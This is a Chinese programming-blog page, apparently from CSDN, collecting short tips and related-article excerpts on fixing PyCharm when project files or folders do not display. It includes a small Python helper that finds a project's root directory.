找到文件夹下的idea文件夹,删除,重新打开项目文件。关机重启电脑,重新打开pycharm。可能是项目文件配置出错了。
pycharm文件夹未显示
weixin_45191158的博客
07-26 1068
【代码】pycharm文件夹未显示
PyCharm设置“中没有“项目“选项
m0_52547482的博客
07-07 877
PyCharm软件"设置"中没有"项目"选项。
Pycharm打开已有项目配置python环境的方法
12-17
本文将详细介绍如何在PyCharm打开已有项目并配置Python编译环境。 首先,打开PyCharm进行项目导入。启动PyCharm,点击菜单栏的“File” -> “Open...”,然后在弹出的对话框中选择你要打开项目根路径。这样,...
解决pycharm导入本地py文件时,模块下方出现红色波浪线的问题
09-16
在使用PyCharm进行Python开发的过程中,可能会遇到这样的情况:当你尝试导入一个位于本地项目的其他py文件时,虽然导入语句能够正常执行,但在编辑器中却会看到该导入语句下方出现了红色波浪线。这种情况可能会让人...
详解pycharm的newproject左侧没有出现项目选项的情况下创建Django项目的解决方法/社区版pycharm创建django项目的方法
09-24
在使用PyCharm社区版创建Django项目时,有时会遇到“New Project”左侧未显示Django选项的情况。这通常是由于PyCharm社区版直接内置Django支持导致的。以下是一步步解决这个问题并手动创建Django项目的方法: 1. ...
pycharm无法导入自己写的包以及Project栏中显示项目文件
我亦无他,唯手熟尔
12-15 1282
pycharm无法导入自己写的包以及Project栏中显示项目文件解决方案
pycharm运行正确,部分内容无法显示问题解决
LJL_python的博客
12-22 801
结束。
python程序编译之后、找到生成的pyc文件_浅谈python编译pyc工程--导包问题解决...
weixin_36455001的博客
02-04 850
利用python 编译工程,生产pyc文件pyc文件好处:是一种二进制机器码,并且隐藏了源文件代码,但是有和py文件一样的功能(可以理解为效果一样)所以可以将代码隐藏,便于商业价值,保护代码隐私还能和py文件一样可运行import compileallcompileall.compile_dir(r'/path')所以在一些情况下,需将源文件工程批量生成pyc文件来隐藏代码。上面代码即为 批量生成...
PyCharm 打开本地项目显示项目文件
热门推荐
huang.xiao的专栏
10-11 1万+
一、问题现象 PyCharm之前一直正常。 从github克隆了一个项目本地。 用PyCharm打开,发现打开显示项目文件。 问题排查: 本地新建项目发现可以显示项目文件 通过file–>settings–>project stucture—>选中自己的项目路径,然后将其标记成Sourses和Excluded,但是还是能看到项目文件。 二、解决办法 问题分析 PyCharm打开本地项目面有.idea目录,这个目录时PyCharm对应的项目配置。 同版本的PyCha
pycharm导入项目后,目录结构及文件显示灰色,执行脚本后提示ModuleNotFoundError
weixin_32906197的博客
03-10 1111
新导入python项目,需要Setting 下 添加项目结构,如图点击+,选中根目录即可。
常见Python运行时错误
程序猿的视界
12-19 3195
当初学 Python 时,想要弄懂 Python 的错误信息的含义可能有点复杂。这列出了常见的的一些让你程序 crash 的运行时错误。 1)忘记在 if , elif , else , for , while , class ,def 声明末尾添加 :(导致 “SyntaxError :invalid syntax”) 该错误将发生在类似如下代码中: if spam == 4
pycharm目录下的文件没有显示出来,可能是一下配置
qq_15821487的博客
10-17 3744
找到被排除的文件、取消被排除即可显示
为什么用PyCharm打开某个项目,有些项目显示Git工具栏,而有些项目没有?
m0_52848925的博客
06-09 5233
如果项目的 .git 文件夹被删了,PyCharm则会通过 .gitignore 文件或者 .gitmodules 文件来识别项目关联的Git仓库,并显示Git工具栏。②被修改过的文件的颜色会变,再是黑色了,会变成蓝色(修改了内容)、红色(新增的文件,但没有git add)、绿色(新增的文件,且已经git add,没有commit)。②PyCharm显示Git工具栏,但如果你对项目进行了修改,它会提示你进行git add和commit(就是将新改的信息记录到 .git 文件)。
pycharm打开文件
最新发布
02-14
### PyCharm 打开文件显示全的解决方案 当遇到PyCharm打开文件显示全的情况时,可以尝试以下几种方法来解决问题。 #### 方法一:清理缓存并重启IDE 有时IDE内部缓存可能导致文件加载异常。通过清除缓存再启动程序能够有效改善此状况。具体操作路径为`File -> Invalidate Caches / Restart...`,之后按照提示完成相应动作即可[^1]。 #### 方法二:调整编辑器字体设置 如果是因为字体原因造成的内容显示问题,则可以通过修改编辑区内的文字样式来进行修复。进入`Settings/Preferences | Editor | Font`选项卡内更改合适的字号大小以及启用抗锯齿功能等参数配置[^2]。 #### 方法三:检查项目结构配置 对于某些特定场景下的源码视图缺失现象,可能是由于当前工作空间未能正确识别全部模块所引起。此时应该核查Project Structure的Content Roots设定项是否涵盖了整个工程根目录;必要时可手动添加遗漏部分,并保存变更生效[^3]。 ```python # 示例代码用于展示如何获取当前项目的根路径,在实际应用中可根据需求调用该函数辅助排查问题 import os def get_project_root(): current_file = os.path.abspath(__file__) project_dir = os.path.dirname(current_file) while not os.path.exists(os.path.join(project_dir, '.idea')): parent_dir = os.path.dirname(project_dir) if parent_dir == project_dir: break project_dir = parent_dir return project_dir print(f"Current Project Root Directory is {get_project_root()}") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无极921

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值